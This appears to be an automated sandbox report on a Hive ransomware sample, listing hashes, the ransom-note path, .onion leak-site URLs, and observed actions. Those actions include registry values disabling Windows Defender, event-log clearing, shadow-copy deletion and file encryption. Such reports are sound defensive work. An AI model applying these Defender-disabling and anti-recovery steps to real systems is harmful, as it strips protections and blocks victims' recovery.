Analysis
-
max time kernel
145s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-11-2024 06:52
Static task
static1
Behavioral task
behavioral1
Sample
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe
Resource
win10v2004-20241007-en
General
-
Target
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe
-
Size
3.3MB
-
MD5
593bd62eceeda58654db4440f104145a
-
SHA1
b1b91ca760e16a73ed089de05fde9e78fe27416d
-
SHA256
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343
-
SHA512
cc0d4f57815d0dbce6c59cf05920e93c0fa8340aad8effde3160fde2ddb3eb132d1f6a06d2f40176c7ab16c033312ac34f086f977724a47130f94e6054fc09e6
-
SSDEEP
49152:uVcQjH6VIOIgQFF3KzfKeSQSqFvVqp/kHzQJqEFH1D1Rc:uVpjK7xWF34fSQSqFvVqpcfEc
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\wFLb_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 2696 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid Process 2256 wevtutil.exe 1372 wevtutil.exe 2124 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
powershell.exepowershell.exepid Process 2632 powershell.exe 2672 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_wuUAcQ1hqQ00.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_off.gif.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_UXpK9Z51aVc0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_sfFQqFrzsPs0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_Vx464XcAOwA0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_48.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_12nLnNnX8Ps0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18207_.WMF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_H9U8nBnGS0M0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.HXS.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_kH9Z3c_VxU40.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_GCnpFjZmBos0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_ttJCP0fAgXI0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_8I9pjNfz0nk0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBLR6.CHM.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_qFETf0UdcoY0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_eP2uMbuDyrw0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_dcaz3Tr4g9E0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_OzQu6_2LSEk0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_pzboqRRi9vg0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Windows Journal\es-ES\Journal.exe.mui 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00222_.WMF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_Vu5EXhiIf2M0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_1hYsUqUHxXo0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\THMBNAIL.PNG.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_IVo1ckLM9yY0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_RLJvKi1jKEU0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_0t2rz1l8B4M0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_GMM2Cnrj0yo0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_ZAqXvqFZPF80.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_qgpLvqzTItc0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_QFI3_27gWZo0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_KGuwnVP952U0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_COL.HXC.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_Bg47aJQ6cb40.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_idAiF7Jbvd80.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_PonS78VrKqM0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_6VvktD-_F3k0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_QYOZICDtUIk0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_lkveQ-kbWGQ0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_8Np0_vItsCg0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_b-4pUNrVIOM0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44F.GIF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_TgzjeirpeUQ0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_TVxrGICh3Gg0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_2KNrZDDOjgU0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\it-IT\mshwLatin.dll.mui 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\TipRes.dll.mui 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_aXObM-UHwXs0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_cIxqaCH2E2A0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\Hx.HxC.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_150fYO6AVSQ0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLJRNL.FAE.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_qXGEAl5eEyc0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_jIgU0vwdHbk0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_07Kt-xMsAPI0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02116_.GIF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf__54siIrpP_I0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_OFwr2FhUxI00.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_gLtBzazot8E0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_4xDjmkaGnGA0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00236_.WMF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_UHfKyandzjw0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_Ws0vq7nSBRc0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45F.GIF.cAlVKOrABdv6hFk8iot3Y127W9W6-eDlBqRQ8KUglLf_QtdnB9rmxVU0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 2584 sc.exe 2968 sc.exe 2228 sc.exe 1744 sc.exe 2684 sc.exe 2820 sc.exe 2808 sc.exe 2864 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exereg.exereg.exepowershell.exeschtasks.exesc.exereg.exenet.exenet1.exenet.exereg.exereg.exesc.exesc.exereg.exenet1.exereg.exereg.exereg.exereg.exenet.exesc.exereg.exereg.exewmic.exenet.exereg.exeschtasks.exeschtasks.exereg.exereg.exesc.exereg.exenet1.exereg.exereg.exenet1.exesc.exereg.exewevtutil.exenet.exenet.exeschtasks.exewevtutil.exewmic.execmd.exenet1.exevssadmin.exeschtasks.exenet.exenet.exesc.exesc.exereg.exereg.exereg.exe80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exereg.execmd.execmd.exereg.exenet1.exereg.exenet1.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 1792 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exepid Process 2632 powershell.exe 2672 powershell.exe 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe -
